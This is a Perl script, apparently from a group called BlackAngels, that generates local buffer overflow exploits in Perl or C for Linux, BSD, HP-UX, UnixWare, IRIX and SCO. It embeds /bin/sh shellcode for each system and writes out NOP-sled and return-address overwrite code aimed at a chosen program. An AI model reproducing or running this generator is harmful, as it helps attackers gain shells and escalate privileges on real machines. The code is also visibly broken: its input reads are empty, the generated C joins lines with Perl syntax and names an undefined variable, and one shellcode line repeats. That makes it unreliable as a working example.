#!/usr/bin/perl ## # Local buffer overflow exploits generator # # Legal notes : # The BlackAngels staff refuse all responsabilities # for an incorrect or illegal use of this software # or for eventual damages to others systems. # # http://www.blackangels.it ## print "\n\n##\n"; print "# Local buffer overflow exploits generator\n"; print "# for Linux, BSD, iBSD, HP-UX, UnixWare, IRIX and SCO\n"; print "#\n"; print "# Legal notes :\n"; print "# The BlackAngels staff refuse all responsabilities for an incorrect\n"; print "# or illegal use of this software or for eventual damages to others\n"; print "# systems.\n"; print "#\n"; print "# This software could generate buffer overflow's exploits for\n"; print "# Linux, BSD, HP-UX, UnixWare, IRIX and SCO systems, in two\n"; print "# different languages ( c and perl ).\n"; print "#\n"; print "# http://www.blackAngels.it\n"; print "##\n\n\n"; print "Language [Perl=1, C=2] : "; $language=; chomp $language; if ( $language eq "1" ) { print "\nProgram location [Default = /bin/sh] : "; $vulnlocate=; print "Buffer size, leave blank for default [Default = 1024] : "; $buffersize=; print "Offset, leave blank for default [Default = 0] : "; $offset=; print "Return address : "; $retaddrs=; print "Exploit's parameters, leave blank for none [Ex. -x] : "; $parameters=; print "Operative system\n[Linux=1, BSD=2, iBSD=3, HP-UX=4, UnixWare=5, IRIX=6, SCO=7] : "; $operativesys=; print "Exploit's name [Default = localoverflow] : "; $expname=; chomp $vulnlocate; chomp $buffersize; chomp $offset; chomp $retaddrs; chomp $parameters; chomp $operativesys; chomp $expname; if ( $expname eq "" ) { $expname="localoverflow" } if ( $vulnlocate eq "" ) { $vulnlocate="/bin/sh"; } if ( $buffersize eq "" ) { $buffersize="1024"; } if ( $offset eq "" ) { $offset="0"; } open(exploitcode, ">>".$expname.".pl"); print exploitcode " \#!/usr/bin/perl \# Exploit code generated with : \# \"Local buffer overflow exploits generator 1.1\" \# \# Legal notes : \# The BlackAngels staff refuse all responsabilities for an incorrect \# or illegal use of this software or for eventual damages to others systems. \# \# [ http://www.BlackAngels.it ] \$shellcode = \n"; if ( $operativesys eq "1" ) { print exploitcode "\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\" .\n"; print exploitcode "\"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\" .\n"; print exploitcode "\"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";\n"; } if ( $operativesys eq "2" ) { print exploitcode "\"\\xeb\\x37\\x5e\\x31\\xc0\\x88\\x46\\xfa\\x89\\x46\\xf5\\x89\\x36\\x89\\x76\" .\n"; print exploitcode "\"\\x89\\x46\\x0c\\x88\\x46\\x17\\x88\\x46\\x1a\\x88\\x46\\x1d\\x50\\x56\\xff\" .\n"; print exploitcode "\"\\x89\\x46\\x0c\\x88\\x46\\x17\\x88\\x46\\x1a\\x88\\x46\\x1d\\x50\\x56\\xff\" .\n"; print exploitcode "\"\\x36\\xb0\\x3b\\x50\\x90\\x9a\\x01\\x01\\x01\\x01\\x07\\x07\\xe8\\xc4\\xff\" .\n"; print exploitcode "\"\\xff\\xff\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\" .\n"; print exploitcode "\"\\x02\\x02\\x02/bin/sh.-c.sh\";\n"; } if ( $operativesys eq "3" ) { print exploitcode "\"\\xeb\\x1f\\x5e\\x31\\xc0\\x89\\x46\\xf5\\x88\\x46\\xfa\\x89\\x46\\x0c\\x89\\x76\" .\n"; print exploitcode "\"\\x08\\x50\\x8d\\x5e\\x08\\x53\\x56\\x56\\xb0\\x3b\\x9a\\xff\\xff\\xff\\xff\\x07\" .\n"; print exploitcode "\"\\xff\\xe8\\xdc\\xff\\xff\\xff/bin/sh\\x00\";\n"; } if ( $operativesys eq "4" ) { print exploitcode "\"\\xe8\\x3f\\x1f\\xfd\\x08\\x21\\x02\\x80\\x34\\x02\\x01\\x02\\x08\\x41\\x04\\x02\\x60\\x40\" .\n"; print exploitcode "\"\\x01\\x62\\xb4\\x5a\\x01\\x54\\x0b\\x39\\x02\\x99\\x0b\\x18\\x02\\x98\\x34\\x16\\x04\\xbe\" .\n"; print exploitcode "\"\\x20\\x20\\x08\\x01\\xe4\\x20\\xe0\\x08\\x96\\xd6\\x05\\x34\\xde\\xad\\xca\\xfe/bin/sh\\xff\";\n"; } if ( $operativesys eq "5" ) { print exploitcode "\"\\xeb\\x48\\x9a\\xff\\xff\\xff\\xff\\x07\\xff\\xc3\\x5e\\x31\\xc0\\x89\\x46\\xb4\" .\n"; print exploitcode "\"\\x88\\x46\\xb9\\x88\\x46\\x07\\x89\\x46\\x0c\\x31\\xc0\\x50\\xb0\\x8d\\xe8\\xdf\" .\n"; print exploitcode "\"\\xff\\xff\\xff\\x83\\xc4\\x04\\x31\\xc0\\x50\\xb0\\x17\\xe8\\xd2\\xff\\xff\\xff\" .\n"; print exploitcode "\"\\x83\\xc4\\x04\\x31\\xc0\\x50\\x8d\\x5e\\x08\\x53\\x8d\\x1e\\x89\\x5e\\x08\\x53\" .\n"; print exploitcode "\"\\xb0\\x3b\\xe8\\xbb\\xff\\xff\\xff\\x83\\xc4\\x0c\\xe8\\xbb\\xff\\xff\\xff\\x2f\" .\n"; print exploitcode "\"\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\";\n"; } if ( $operativesys eq "6" ) { print exploitcode "\"\\x04\\x10\\xff\\xff\\x24\\x02\\x03\\xf3\\x23\\xff\\x02\\x14\\x23\\xe4\\xfe\" .\n"; print exploitcode "\"\\x08\\x23\\xe5\\xfe\\x10\\xaf\\xe4\\xfe\\x10\\xaf\\xe0\\xfe\\x14\\xa3\\xe0\" .\n"; print exploitcode "\"\\xfe\\x0f\\x03\\xff\\xff\\xcc/bin/sh\";\n"; } if ( $operativesys eq "7" ) { print exploitcode "\"\\xeb\\x1b\\x5e\\x31\\xdb\\x89\\x5e\\x07\\x89\\x5e\\x0c\\x88\\x5e\\x11\\x31\\xc0\" .\n"; print exploitcode "\"\\xb0\\x3b\\x8d\\x7e\\x07\\x89\\xf9\\x53\\x51\\x56\\x56\\xeb\\x10\\xe8\\xe0\\xff\" .\n"; print exploitcode "\"\\xff\\xff/bin/sh\\xaa\\xaa\\xaa\\xaa\\x9a\\xaa\\xaa\\xaa\\xaa\\x07\\xaa\";\n"; } print exploitcode " \$bsize = $buffersize; \$retaddr = $retaddrs; \$nop = \"\\x90\"; \$offset = $offset; for (\$i = 0; \$i < (\$bsize - length(\$shellcode) - 100); \$i++) { \$buffer .= \$nop; } \$buffer .= \$shellcode; print \"Using address : 0x\", sprintf('\%lx',(\$retaddr + \$offset)), \"\\n\"; \$newret = pack('l', (\$retaddr + \$offset)); for (\$i += length(\$shellcode); \$i < \$bsize; \$i += 4) { \$buffer .= \$newret; }\n"; if ( $parameters eq "" ) { print exploitcode "exec(\"$vulnlocate \$buffer\");"; } else { print exploitcode "exec(\"$vulnlocate $parameters \$buffer\");"; } close(exploitcode); } else { print "\nProgram location [Default = /bin/sh] : "; $vulnlocate=; print "Program name : "; $vulnprg=; print "Buffer size, leave blank for default [Default = 1024] : "; $buffersize=; print "Offset, leave blank for default [Default = 0] : "; $offset=; print "Align, leave blank for default [Default = 0] : "; $allign=; print "Exploit's parameters, leave blank for none [Ex. -x] : "; $parameters=; print "Operative system\n[Linux=1, BSD=2, iBSD=3, HP-UX=4, UnixWare=5, IRIX=6, SCO=7] : "; $operativesys=; print "Exploit's name [Default = localoverflow] : "; $expname=; chomp $vulnprg; chomp $vulnlocate; chomp $buffersize; chomp $offset; chomp $allign; chomp $parameters; chomp $operativesys; chomp $expname; if ( $expname eq "" ) { $expname="localoverflow" } if ( $vulnlocate eq "" ) { $vulnlocate="/bin/sh"; } if ( $buffersize eq "" ) { $buffersize="1024"; } if ( $offset eq "" ) { $offset="0"; } if ( $allign eq "" ) { $allign="0"; } open(exploitcode, ">>".$expname.".c"); print exploitcode " /* Exploit code generated with : \"Local buffer overflow exploits generator 1.1\" Legal notes : The BlackAngels staff refuse all responsabilities for an incorrect or illegal use of this software or for eventual damages to others systems. [ http://www.BlackAngels.it ] */ \#include \#include \#include \#define BSIZE $buffersize \#define ALIGN $allign \#define OFFSET $offset \#define NOP 0x90 unsigned char shellcode[] =\n"; if ( $operativesys eq "1" ) { print exploitcode "\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\" .\n"; print exploitcode "\"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\" .\n"; print exploitcode "\"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";\n"; } if ( $operativesys eq "2" ) { print exploitcode "\"\\xeb\\x37\\x5e\\x31\\xc0\\x88\\x46\\xfa\\x89\\x46\\xf5\\x89\\x36\\x89\\x76\" .\n"; print exploitcode "\"\\x89\\x46\\x0c\\x88\\x46\\x17\\x88\\x46\\x1a\\x88\\x46\\x1d\\x50\\x56\\xff\" .\n"; print exploitcode "\"\\x89\\x46\\x0c\\x88\\x46\\x17\\x88\\x46\\x1a\\x88\\x46\\x1d\\x50\\x56\\xff\" .\n"; print exploitcode "\"\\x36\\xb0\\x3b\\x50\\x90\\x9a\\x01\\x01\\x01\\x01\\x07\\x07\\xe8\\xc4\\xff\" .\n"; print exploitcode "\"\\xff\\xff\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\" .\n"; print exploitcode "\"\\x02\\x02\\x02/bin/sh.-c.sh\";\n"; } if ( $operativesys eq "3" ) { print exploitcode "\"\\xeb\\x1f\\x5e\\x31\\xc0\\x89\\x46\\xf5\\x88\\x46\\xfa\\x89\\x46\\x0c\\x89\\x76\" .\n"; print exploitcode "\"\\x08\\x50\\x8d\\x5e\\x08\\x53\\x56\\x56\\xb0\\x3b\\x9a\\xff\\xff\\xff\\xff\\x07\" .\n"; print exploitcode "\"\\xff\\xe8\\xdc\\xff\\xff\\xff/bin/sh\\x00\";\n"; } if ( $operativesys eq "4" ) { print exploitcode "\"\\xe8\\x3f\\x1f\\xfd\\x08\\x21\\x02\\x80\\x34\\x02\\x01\\x02\\x08\\x41\\x04\\x02\\x60\\x40\" .\n"; print exploitcode "\"\\x01\\x62\\xb4\\x5a\\x01\\x54\\x0b\\x39\\x02\\x99\\x0b\\x18\\x02\\x98\\x34\\x16\\x04\\xbe\" .\n"; print exploitcode "\"\\x20\\x20\\x08\\x01\\xe4\\x20\\xe0\\x08\\x96\\xd6\\x05\\x34\\xde\\xad\\xca\\xfe/bin/sh\\xff\";\n"; } if ( $operativesys eq "5" ) { print exploitcode "\"\\xeb\\x48\\x9a\\xff\\xff\\xff\\xff\\x07\\xff\\xc3\\x5e\\x31\\xc0\\x89\\x46\\xb4\" .\n"; print exploitcode "\"\\x88\\x46\\xb9\\x88\\x46\\x07\\x89\\x46\\x0c\\x31\\xc0\\x50\\xb0\\x8d\\xe8\\xdf\" .\n"; print exploitcode "\"\\xff\\xff\\xff\\x83\\xc4\\x04\\x31\\xc0\\x50\\xb0\\x17\\xe8\\xd2\\xff\\xff\\xff\" .\n"; print exploitcode "\"\\x83\\xc4\\x04\\x31\\xc0\\x50\\x8d\\x5e\\x08\\x53\\x8d\\x1e\\x89\\x5e\\x08\\x53\" .\n"; print exploitcode "\"\\xb0\\x3b\\xe8\\xbb\\xff\\xff\\xff\\x83\\xc4\\x0c\\xe8\\xbb\\xff\\xff\\xff\\x2f\" .\n"; print exploitcode "\"\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\";\n"; } if ( $operativesys eq "6" ) { print exploitcode "\"\\x04\\x10\\xff\\xff\\x24\\x02\\x03\\xf3\\x23\\xff\\x02\\x14\\x23\\xe4\\xfe\" .\n"; print exploitcode "\"\\x08\\x23\\xe5\\xfe\\x10\\xaf\\xe4\\xfe\\x10\\xaf\\xe0\\xfe\\x14\\xa3\\xe0\" .\n"; print exploitcode "\"\\xfe\\x0f\\x03\\xff\\xff\\xcc/bin/sh\";\n"; } if ( $operativesys eq "7" ) { print exploitcode "\"\\xeb\\x1b\\x5e\\x31\\xdb\\x89\\x5e\\x07\\x89\\x5e\\x0c\\x88\\x5e\\x11\\x31\\xc0\" .\n"; print exploitcode "\"\\xb0\\x3b\\x8d\\x7e\\x07\\x89\\xf9\\x53\\x51\\x56\\x56\\xeb\\x10\\xe8\\xe0\\xff\" .\n"; print exploitcode "\"\\xff\\xff/bin/sh\\xaa\\xaa\\xaa\\xaa\\x9a\\xaa\\xaa\\xaa\\xaa\\x07\\xaa\";\n"; } print exploitcode " unsigned long get_sp(void) { __asm__(\"movl %esp, %eax\"); } int main(\int argc, char **argv) { char *buffer; int i; int bsize = BSIZE; int align = ALIGN; int offset = OFFSET; unsigned long addr; \if(argc > 1) bsize = atoi(argv[1]); buffer = (char *)malloc(bsize); bzero(buffer, bsize); memset(buffer, NOP, bsize); addr = get_sp() - offset; *(unsigned long *)&buffer[bsize - 4] = addr; *(unsigned long *)&buffer[bsize - 8] = addr; memcpy(buffer + bsize - 8 - align - strlen(esshellcode), esshellcode, strlen(esshellcode));\n"; if ( $parameters eq "" ) { print exploitcode "execl(\"$vulnlocate\", \"$vulnprg\", buffer, NULL);}"; } else { print exploitcode "execl(\"$vulnlocate\", \"$vulnprg\", \"$parameters\", buffer, NULL);}"; } close(exploitcode); }